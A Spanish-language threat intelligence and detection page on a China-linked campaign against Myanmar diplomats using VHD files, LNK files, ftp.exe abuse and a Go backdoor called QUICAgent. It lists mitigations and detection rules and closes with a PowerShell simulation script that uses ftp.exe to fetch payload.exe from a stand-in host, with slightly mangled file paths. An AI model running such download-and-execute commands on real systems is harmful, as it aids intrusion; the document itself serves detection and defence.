Actor vinculado a China utiliza archivos VHD para atacar a diplomáticos de Myanmar
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
Un actor de amenaza vinculado a China está atacando al personal del gobierno de Myanmar a través de una cadena de infección de múltiples etapas entregada mediante archivos de disco duro virtual (VHD). La campaña utiliza archivos LNK maliciosos para abusar de ftp.exe para la reconstrucción de la carga útil y despliega una puerta trasera personalizada basada en Go conocida como QUICAgent. El malware depende de Cloudflare Workers para la resolución dinámica de C2 y se comunica a través del protocolo QUIC.
Investigación
El equipo APT de Seqrite analizó muestras de VHD que contenían documentos señuelo e identificó archivos LNK maliciosos disfrazados como archivos PDF. La investigación descubrió una técnica de carga útil dividida en la que dos archivos se combinan con el comando copy para reconstruir un ejecutable. El análisis técnico del implante QUICAgent también reveló evasión de sandbox a través de hashing repetido SHA-256 y validación personalizada de certificado TLS.
Mitigación
Las organizaciones deben restringir la ejecución de archivos LNK no confiables y monitorear procesos secundarios sospechosos que involucren ftp.exe. Se recomiendan controles estrictos alrededor del uso de discos duros virtuales (VHD) y monitoreo de tráfico de red inusual sobre el puerto UDP 443 usando QUIC. Bloquear puntos finales maliciosos conocidos de Cloudflare Worker también puede interrumpir el mecanismo de resolución C2 de la campaña.
Respuesta
Si se detecta actividad de QUICSILVER, los sistemas afectados deben ser aislados inmediatamente para detener la exfiltración de datos y la comunicación C2. Los investigadores deben inspeccionar %LOCALAPPDATA% en busca del binario Windowsupdate.exe y revisar la carpeta de inicio del usuario en busca de SystemIn.lnk. Los registros de red también deben analizarse para detectar conexiones a dominios e IPs de C2 conocidos para determinar el alcance del compromiso.
Flujo de Ataque
Todavía estamos actualizando esta parte.
Detecciones
Archivo LNK Posiblemente Malicioso con Doble Extensión (vía línea de comandos)
Archivo con Doble Extensión Posiblemente Malicioso (vía creación de proceso)
Se Realizó una Operación Manual o de Scripting en Carpetas Inusuales (vía línea de comandos)
LOLBAS ftp (vía línea de comandos)
Binario / Scripts Sospechosos en Ubicación de Autoinicio (vía evento de archivo)
Ejecución Sospechosa desde Unidad Montada (vía auditoría)
Abuso Posible del Dominio de Desarrollo de Cloudflare (vía dns)
IOC (HashSha256) para detectar: Operación QUICSILVER: Actor con Nexo en China Ataca a Diplomáticos de Myanmar a través de Puerta Trasera Entregada por VHD
IOC (SourceIP) para detectar: Operación QUICSILVER: Actor con Nexo en China Ataca a Diplomáticos de Myanmar a través de Puerta Trasera Entregada por VHD
IOC (DestinationIP) para detectar: Operación QUICSILVER: Actor con Nexo en China Ataca a Diplomáticos de Myanmar a través de Puerta Trasera Entregada por VHD
Detección de Comunicación C2 de QUICAgent [Conexión de Red de Windows]
Uso Sospechoso de ftp.exe y Windowsupdate.exe para Ejecución de Malware [Creación de Proceso de Windows]
Ejecución de Simulación
Prerrequisito: La Verificación Pre-vuelo de Telemetría y Línea Base debe haber aprobado.
Justificación: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente los TTP identificados y apuntar a generar la telemetría exacta esperada por la lógica de detección. Ejemplos abstractos o no relacionados conducirán a un diagnóstico erróneo.
-
Narrativa y Comandos de Ataque: Un adversario pretende establecer una base imitando procesos legítimos del sistema. Primero, utiliza
ftp.execon un archivo script (-s:) para descargar una carga útil maliciosa, intentando mezclarse con tareas administrativas automatizadas. Simultáneamente, simulan el despliegue de un binario de «Actualización de Windows» (renombrado) para enmascarar la ejecución de la carga útil. Finalmente, utilizan un script de PowerShell diseñado para crear un.lnkarchivo malicioso para asegurar la persistencia mediante la interacción del usuario. -
Script de Prueba de Regresión:
# 1. Simular descarga de script de FTP (Activación 1 Parte A) $ftpScript = "open ftp.example.com`nuser anonymous anonymous`nget payload.exe`nquit" $ftpScript | Out-File -FilePath "$env:TEMPftp_script.txt" -Encoding ASCII Start-Process "ftp.exe" -ArgumentList "-s:$env:TEMPftp_script.txt" -Wait # 2. Simular ejecución de Windowsupdate.exe (Activación 1 Parte B) # Nota: Esto asume que existe un archivo llamado Windowsupdate.exe o se está llamando # Para simulación, crearemos un archivo ficticio y lo ejecutaremos New-Item -Path "$env:TEMPWindowsupdate.exe" -ItemType File -Force Start-Process "$env:TEMPWindowsupdate.exe" # 3. Simular creación de LNK con PowerShell (Activación 2) Start-Process "powershell.exe" -ArgumentList "-Command", "Write-Output 'create_lnk_process_running'" -
Comandos de Limpieza:
# Eliminar artefactos simulados Remove-Item -Path "$env:TEMPftp_script.txt" -ErrorAction SilentlyContinue Remove-Item -Path "$env:TEMPWindowsupdate.exe" -ErrorAction SilentlyContinue